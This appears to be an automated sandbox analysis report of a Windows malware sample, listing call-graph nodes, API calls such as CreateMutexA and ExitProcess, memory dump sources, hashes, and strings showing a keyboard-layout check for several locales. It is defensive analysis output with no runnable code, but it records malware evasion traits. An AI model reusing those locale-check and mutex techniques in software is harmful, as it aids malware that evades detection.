12550->12546 12552->12546 12554 892c0e 12553->12554 12560 8ab847 12554->12560 12556 892c42 12557 892c49 12556->12557 12566 892c80 12556->12566 12557->12546 12559 892c58 Concurrency::cancel_current_task 12561 8ab854 12560->12561 12565 8ab873 Concurrency::details::_Reschedule_chore 12560->12565 12569 8acb77 12561->12569 12563 8ab864 12563->12565 12571 8ab81e 12563->12571 12565->12556 12577 8ab7fb 12566->12577 12568 892cb2 shared_ptr 12568->12559 12570 8acb92 CreateThreadpoolWork 12569->12570 12570->12563 12572 8ab827 Concurrency::details::_Reschedule_chore 12571->12572 12575 8acdcc 12572->12575 12574 8ab841 12574->12565 12576 8acde1 TpPostWork 12575->12576 12576->12574 12578 8ab807 12577->12578 12580 8ab817 12577->12580 12578->12580 12581 8aca78 12578->12581 12580->12568 12582 8aca8d TpReleaseWork 12581->12582 12582->12580 12864 893fe0 12866 894022 12864->12866 12865 894035 std::future_error::future_error 12866->12865 12867 89408c 12866->12867 12868 8940d2 12866->12868 12871 8935e0 12867->12871 12869 893ee0 3 API calls 12868->12869 12869->12865 12872 893616 12871->12872 12873 892ce0 5 API calls 12872->12873 12876 89364e Concurrency::cancel_current_task shared_ptr std::future_error::future_error 12872->12876 12874 89369e 12873->12874 12875 892c00 3 API calls 12874->12875 12874->12876 12875->12876 12876->12865 12882 89af20 12883 89af63 12882->12883 12894 8c6660 12883->12894 12888 8c663f 4 API calls 12889 89af80 12888->12889 12890 8c663f 4 API calls 12889->12890 12891 89af98 __cftof 12890->12891 12900 8955f0 12891->12900 12893 89b04e shared_ptr std::future_error::future_error 12895 8ca671 __fassign 4 API calls 12894->12895 12896 89af69 12895->12896 12897 8c663f 12896->12897 12898 8ca671 __fassign 4 API calls 12897->12898 12899 89af71 12898->12899 12899->12888 12901 895610 12900->12901 12903 895710 std::future_error::future_error 12901->12903 12904 8922c0 12901->12904 12903->12893 12907 892280 12904->12907 12908 892296 12907->12908 12911 8c87f8 12908->12911 12914 8c7609 12911->12914 12913 8922a4 12913->12901 12915 8c7649 12914->12915 12917 8c7631 ___std_exception_copy std::future_error::future_error 12914->12917 12916 8c690a __fassign 4 API calls 12915->12916 12915->12917 12918 8c7661 12916->12918 12917->12913 12920 8c7bc4 12918->12920 12922 8c7bd5 12920->12922 12921 8c7be4 ___std_exception_copy 12921->12917 12922->12921 12927 8c8168 12922->12927 12932 8c7dc2 12922->12932 12937 8c7de8 12922->12937 12947 8c7f36 12922->12947 12928 8c8178 12927->12928 12929 8c8171 12927->12929 12928->12922 12956 8c7b50 12929->12956 12931 8c8177 12931->12922 12933 8c7dcb 12932->12933 12935 8c7dd2 12932->12935 12934 8c7b50 4 API calls 12933->12934 12936 8c7dd1 12934->12936 12935->12922 12936->12922 12942 8c7def 12937->12942 12943 8c7e09 ___std_exception_copy 12937->12943 12938 8c7f69 12941 8c7f8b 12938->12941 12946 8c7f77 12938->12946 12964 8c8241 12938->12964 12940 8c7fa2 12940->12941 12960 8c8390 12940->12960 12941->12922 12942->12938 12942->12940 12942->12943 12942->12946 12943->12922 12946->12941 12968 8c86ea 12946->12968 12948 8c7f69 12947->12948 12949 8c7f4f 12947->12949 12950 8c8241 4 API calls 12948->12950 12954 8c7f77 12948->12954 12955 8c7f8b 12948->12955 12949->12948 12951 8c7fa2 12949->12951 12949->12954 12950->12954 12952 8c8390 4 API calls 12951->12952 12951->12955 12952->12954 12953 8c86ea 4 API calls 12953->12955 12954->12953 12954->12955 12955->12922 12957 8c7b62 12956->12957 12958 8c8ab6 4 API calls 12957->12958 12959 8c7b85 12958->12959 12959->12931 12962 8c83ab 12960->12962 12961 8c83dd 12961->12946 12962->12961 12972 8cc88e 12962->12972 12965 8c825a 12964->12965 12979 8cd3c8 12965->12979 12967 8c830d 12967->12946 12970 8c875d std::future_error::future_error 12968->12970 12971 8c8707 12968->12971 12969 8cc88e __cftof 4 API calls 12969->12971 12970->12941 12971->12969 12971->12970 12975 8cc733 12972->12975 12974 8cc8a6 12974->12961 12976 8cc743 12975->12976 12977 8cc748 __cftof ___std_exception_copy 12976->12977 12978 8c690a __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12976->12978 12977->12974 12978->12977 12980 8cd3d8 ___std_exception_copy 12979->12980 12983 8cd3ee 12979->12983 12980->12967 12981 8cd485 12985 8cd4ae 12981->12985 12986 8cd4e4 12981->12986 12982 8cd48a 12992 8ccbdf 12982->12992 12983->12980 12983->12981 12983->12982 12987 8cd4cc 12985->12987 12988 8cd4b3 12985->12988 13009 8ccef8 12986->13009 13005 8cd0e2 12987->13005 12998 8cd23e 12988->12998 12993 8ccbf1 12992->12993 12994 8c690a __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12993->12994 12995 8ccc05 12994->12995 12996 8ccef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 12995->12996 12997 8ccc0d __alldvrm __cftof ___std_exception_copy _strrchr 12995->12997 12996->12997 12997->12980 12999 8cd26c 12998->12999 13000 8cd2a5 12999->13000 13001 8cd2de 12999->13001 13002 8cd2b7 12999->13002 13000->12980 13003 8ccf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13001->13003 13004 8cd16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13002->13004 13003->13000 13004->13000 13006 8cd10f 13005->13006 13007 8cd14e 13006->13007 13008 8cd16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13006->13008 13007->12980 13008->13007 13010 8ccf10 13009->13010 13011 8ccf75 13010->13011 13012 8ccf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13010->13012 13011->12980 13012->13011 12683 899ba5 12684 899ba7 12683->12684 12685 895c10 6 API calls 12684->12685 12686 899cb1 12685->12686 12687 898b30 6 API calls 12686->12687 12688 899cc2 12687->12688 12613 899ab8 12615 899acc 12613->12615 12616 899b08 12615->12616 12617 895c10 6 API calls 12616->12617 12618 899b7c 12617->12618 12625 898b30 12618->12625 12620 899b8d 12621 895c10 6 API calls 12620->12621 12622 899cb1 12621->12622 12623 898b30 6 API calls 12622->12623 12624 899cc2 12623->12624 12626 898b7c 12625->12626 12627 895c10 6 API calls 12626->12627 12628 898b97 shared_ptr std::future_error::future_error 12627->12628 12628->12620 12583 898d30 12584 898d7f 12583->12584 12585 895c10 6 API calls 12584->12585 12586 898d9a shared_ptr std::future_error::future_error 12585->12586 12605 892170 12606 8ac6fc InitializeCriticalSectionEx 12605->12606 12607 89217a 12606->12607 12629 8942b0 12632 893ac0 12629->12632 12631 8942bb shared_ptr 12634 893af9 12632->12634 12633 893b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 12633->12631 12634->12633 12635 8932d0 6 API calls 12634->12635 12637 893c38 12634->12637 12635->12637 12636 8932d0 6 API calls 12639 893c5f 12636->12639 12637->12636 12637->12639 12638 893c68 12638->12631 12639->12638 12640 893810 4 API calls 12639->12640 12641 893cdb 12640->12641 12689 8977b0 12690 8977f1 shared_ptr 12689->12690 12691 895c10 6 API calls 12690->12691 12693 897883 shared_ptr 12690->12693 12691->12693 12692 895c10 6 API calls 12695 8979e3 12692->12695 12693->12692 12694 897953 shared_ptr std::future_error::future_error 12693->12694 12696 895c10 6 API calls 12695->12696 12697 897a15 shared_ptr 12696->12697 12698 895c10 6 API calls 12697->12698 12703 897aa5 shared_ptr std::future_error::future_error 12697->12703 12699 897b7d 12698->12699 12700 895c10 6 API calls 12699->12700 12701 897ba0 12700->12701 12702 895c10 6 API calls 12701->12702 12702->12703 12704 8987b0 12705 8987b8 GetFileAttributesA 12704->12705 12706 8987b6 12704->12706 12707 8987c4 12705->12707 12706->12705 12708 8a47b0 12710 8a4eed 12708->12710 12709 8a4f59 shared_ptr std::future_error::future_error 12710->12709 12711 897d30 7 API calls 12710->12711 12712 8a50ed 12711->12712 12747 898380 12712->12747 12714 8a5106 12715 895c10 6 API calls 12714->12715 12716 8a5155 12715->12716 12717 895c10 6 API calls 12716->12717 12718 8a5171 12717->12718 12753 899a00 12718->12753 12748 8983e5 __cftof 12747->12748 12749 895c10 6 API calls 12748->12749 12752 898403 shared_ptr std::future_error::future_error 12748->12752 12750 898427 12749->12750 12751 895c10 6 API calls 12750->12751 12751->12752 12752->12714 12754 899a3f 12753->12754 12755 895c10 6 API calls 12754->12755 12756 899a47 12755->12756 12757 898b30 6 API calls 12756->12757 12758 899a58 12757->12758 12201 8987b2 12202 8987b8 GetFileAttributesA 12201->12202 12203 8987b6 12201->12203 12204 8987c4 12202->12204 12203->12202 12510 89a9f4 12521 899230 12510->12521 12512 89aa03 shared_ptr 12513 895c10 6 API calls 12512->12513 12519 89aab3 shared_ptr 12512->12519 12514 89aa65 12513->12514 12515 895c10 6 API calls 12514->12515 12516 89aa8d 12515->12516 12517 895c10 6 API calls 12516->12517 12517->12519 12520 89ad3c shared_ptr std::future_error::future_error 12519->12520 12531 8c8ab6 12519->12531 12522 899284 shared_ptr 12521->12522 12523 895c10 6 API calls 12522->12523 12529 89944f shared_ptr 12522->12529 12523->12522 12524 899543 shared_ptr std::future_error::future_error 12524->12512 12525 895c10 6 API calls 12525->12529 12526 8998b5 shared_ptr std::future_error::future_error 12526->12512 12527 89979f shared_ptr 12527->12526 12528 895c10 6 API calls 12527->12528 12530 899927 shared_ptr std::future_error::future_error 12528->12530 12529->12524 12529->12525 12529->12527 12530->12512 12532 8c8ad1 12531->12532 12533 8c8868 4 API calls 12532->12533 12534 8c8adb 12533->12534 12534->12519 12672 894276 12673 892410 5 API calls 12672->12673 12674 89427f 12673->12674
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ExitProcess.KERNEL32(?,?,008C652A,?,?,?,?,?,008C7661), ref: 008C6567
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1457671208.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457682859.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457732745.00000000008F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457774864.00000000008FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457790768.0000000000905000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457802488.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457813801.0000000000907000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458357790.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458376642.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458392856.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458420879.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458626713.0000000000A85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458645187.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458657521.0000000000A88000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458929915.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458945923.0000000000A8B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458960976.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458977774.0000000000A9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458989840.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459005401.0000000000AB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459024005.0000000000AB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459038850.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459072461.0000000000ADE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459086887.0000000000AE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459101565.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459116097.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459131565.0000000000AF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459144829.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459158858.0000000000AF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459171112.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459184882.0000000000B05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459199433.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459214292.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459227978.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459240014.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459252716.0000000000B16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459264586.0000000000B17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459278527.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459291171.0000000000B23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459305143.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459320428.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459333285.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459345440.0000000000B34000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459359173.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459379108.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459393452.0000000000B44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459405663.0000000000B45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459460215.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459485889.0000000000B92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459501980.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459515010.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459532625.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459545214.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                            • Opcode ID: e8c8b2eac7f28f0611bf3757e1e6305081934692910a6fbeba7726d925da2961
                                                                                                                                                                                            • Instruction ID: 5783af33ad15706f7060f00998a6c80916dddc40d49dd7c06ac82b846a43678a
                                                                                                                                                                                            • Opcode Fuzzy Hash: e8c8b2eac7f28f0611bf3757e1e6305081934692910a6fbeba7726d925da2961
                                                                                                                                                                                            • Instruction Fuzzy Hash: C1E08C30000648AECE257F28C859E583BB9FF41749F201828F9089A222DB35EEA1C691
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1460843167.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ef0000_file.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f4ae1f9e90a2a07691b603918b3b60898571a3c2ee8d683129d8f9487f0cc821
                                                                                                                                                                                            • Instruction ID: 89f4a7144b0e3b71356a5c24ea0ef0d73a98a8e09203e17d805d757ecc7a1f81
                                                                                                                                                                                            • Opcode Fuzzy Hash: f4ae1f9e90a2a07691b603918b3b60898571a3c2ee8d683129d8f9487f0cc821
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6241E4E734D220BEB14295966F149FB2B6EE7D73303309126FA07C6643F2C56A4A7171

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1457671208.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457682859.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457732745.00000000008F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457774864.00000000008FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457790768.0000000000905000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457802488.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457813801.0000000000907000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458357790.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458376642.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458392856.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458420879.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458626713.0000000000A85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458645187.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458657521.0000000000A88000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458929915.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458945923.0000000000A8B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458960976.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458977774.0000000000A9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458989840.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459005401.0000000000AB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459024005.0000000000AB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459038850.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459072461.0000000000ADE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459086887.0000000000AE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459101565.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459116097.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459131565.0000000000AF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459144829.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459158858.0000000000AF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459171112.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459184882.0000000000B05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459199433.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459214292.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459227978.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459240014.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459252716.0000000000B16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459264586.0000000000B17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459278527.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459291171.0000000000B23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459305143.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459320428.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459333285.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459345440.0000000000B34000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459359173.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459379108.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459393452.0000000000B44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459405663.0000000000B45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459460215.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459485889.0000000000B92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459501980.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459515010.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459532625.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459545214.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                            • API String ID: 0-3963862150
                                                                                                                                                                                            • Opcode ID: ea1fc5a76fcf08f01419b32edc7eba61b3ccff8a13042de37a6492c606667169
                                                                                                                                                                                            • Instruction ID: 59da3626cb91bcf0ddd20d513b86f19e9f743b36a169a99cb3c1564702ec583a
                                                                                                                                                                                            • Opcode Fuzzy Hash: ea1fc5a76fcf08f01419b32edc7eba61b3ccff8a13042de37a6492c606667169
                                                                                                                                                                                            • Instruction Fuzzy Hash: 48F1D07090025C9BEF24DF68CC84BDEBBB9FB45304F5442A9E519E7281DB749A84CF91

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 219 899ba5-899d91 call 8a7a00 call 895c10 call 898b30 call 8a8220
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0089A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,008F3254), ref: 0089A981
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1457671208.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457682859.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457732745.00000000008F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457774864.00000000008FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457790768.0000000000905000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457802488.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457813801.0000000000907000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458357790.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458376642.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458392856.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458420879.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
